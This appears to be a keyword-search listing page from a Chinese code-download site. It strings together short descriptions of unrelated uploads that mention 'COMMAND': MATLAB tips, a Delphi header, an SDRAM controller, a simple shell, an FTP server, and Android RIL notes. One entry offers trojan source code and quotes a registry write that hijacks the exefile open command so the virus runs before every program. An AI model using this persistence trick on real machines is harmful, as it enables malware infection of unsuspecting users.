I always believe that one will easily lag behind unless he keeps on learning. Of course, if I am given a chance for advanced studies in this famous University , I will stare to effort to master a good COMMAND of advance my capability.
标签: learning believe always behind
上传时间: 2017-06-13
上传用户:极客
unit ScardCL {**************************************************************************} { } { This C DLL header file first (automatic) conversion generated by: } { HeadConv 4.0 (c) 2000 by Bob Swart (aka Dr.Bob - www.drbob42.com) } { Final Delphi-Jedi (Darth) COMMAND-line units edition } { } { Generated Date: 07.04.2009 } { Generated Time: 05:10:54
上传时间: 2017-06-18
上传用户:13215175592
HSSDRC IP core is the configurable universal SDRAM controller with adaptive bank control and adaptive COMMAND pipeline. HSSDRC IP core and IP core testbench has been written on SystemVerilog and has been tested in Modelsim. HSSDRC IP core is licensed under MIT License
标签: configurable controller universal adaptive
上传时间: 2017-06-25
上传用户:皇族传媒
Kullanı lan bazı matlab bilgileri Matlabda kodlar mfile lara yazı lı p kaydedilebilir. Ü st menüden, file, new, mfile. COMMAND windowa yazdı kları nı zı kaydedemezsiniz. Yazdı ğ ı nı z kodu ç alı ş tı rabilmeniz iç in ç alı ş tı ğ ı nı z current directory nin altı na kaydetmelisiniz. Current directory i dosyanı n bulunduğ u yere de gö türebilirsiniz
标签: 305 bilgileri kaydedile Matlabda
上传时间: 2014-01-06
上传用户:miaochun888
Launch Matlab by either clicking twice on the Matlab icon on your desktop or by selecting: Start Programs Matlab Matlab. The main window is the MATLAB COMMAND Window, where you write your instructions.
标签: Matlab selecting clicking desktop
上传时间: 2017-06-30
上传用户:aa17807091
用纯C语言编写的一个Linux下的Shell,包含tch和bash的基本功能(包含重定向和后台运行),暂时不支持管道。已经在cygwin和Ubantu 7.10下测试通过。 主要包含: makefile 编译生成myshell可执行文件 myshell.c 主函数(涉及程序入口) utility.c 所有功能函数(将近1000行) myshell.h(包含宏定义、结构体声明、库函数的头文件,及utility.c中的所有函数的声明) readme 用户手册(当用户在myshell里输入help <COMMAND> 时,输出<COMMAND>的使用说明)
上传时间: 2014-02-05
上传用户:xymbian
A very simple ftp server s source code for demonstration. * It supports PASV/PORT modes and following operations: * ls,pwd,cwd,get,put,dele. * I have tested it using following ftp clients: * 1. Windows XP s COMMAND line ftp client, * 2. IE 6.0, * 3. Redhat 9.0 s ftp client, * 4. CuteFTP 8, * I ll introduce more functions and improve its performance
标签: demonstration supports followi simple
上传时间: 2013-12-22
上传用户:wl9454
Android的Radio Interface Layer (RIL)提供了电话服务和的radio硬件之间的抽象层。Radio Interface Layer RIL(Radio Interface Layer)负责数据的可靠传输、AT命令的发送以及response的解析。应用处理器通过AT命令集与带GPRS功能的无线通讯模块通信。AT COMMAND由Hayes公司发明,是一个调制解调器制造商采用的一个调制解调器命令语言,每条命令以字母"AT"开头。
上传时间: 2013-12-10
上传用户:pinksun9
可以在安全模式加载的木马源代码 写注册项 (#根类, “exefile\shell\open\COMMAND\”, 取特定目录 (9) + “penguin01.exe ” + #引号 + “ 1” + #引号 + “ *”) 靠着这条就无敌啦``` 运行任意EXE文件 都会先运行病毒文件.
标签: exefileshellopenCOMMAND penguin exe 01
上传时间: 2014-01-02
上传用户:sardinescn
本程序的开发环境为MATLAB6.5版本,所编程序须在此环境下运行。由于气动模型的离散性,且采用了许多工程计算经验公式和实验数据,所以在编程时会比较繁杂,为了使程序读起来方便清晰,在编制程序时采用了如下的思路: 考虑到程序的一般结构,这里将气动计算系统分为三大模块:输入模块、气动计算模块以及结果输出模块。考虑到本系统的特殊性,又将输入模块划分为初始数据输入模块、导弹外形参数模块以及插值数据库模块,并采用M文件格式编制;气动计算模块则采用了子系统的结构形式,并用Simulink 模块编制;结果输出模块则是采用M文件的形式将气动计算模块得到的结果输出到工作区间并将数据结果绘制成曲线。最后,为了运行的方便,编制了一个名为Start_file.m的M文件,按流程依次调用编写的所有程序,在运行此程序时,只需将所有程序加载于“Current Directory”指定的文件夹中(即路径的设定),并在“COMMAND Window”中输入“Start_file”即可。 (导弹气动计算程序)
上传时间: 2014-01-04
上传用户:xhz1993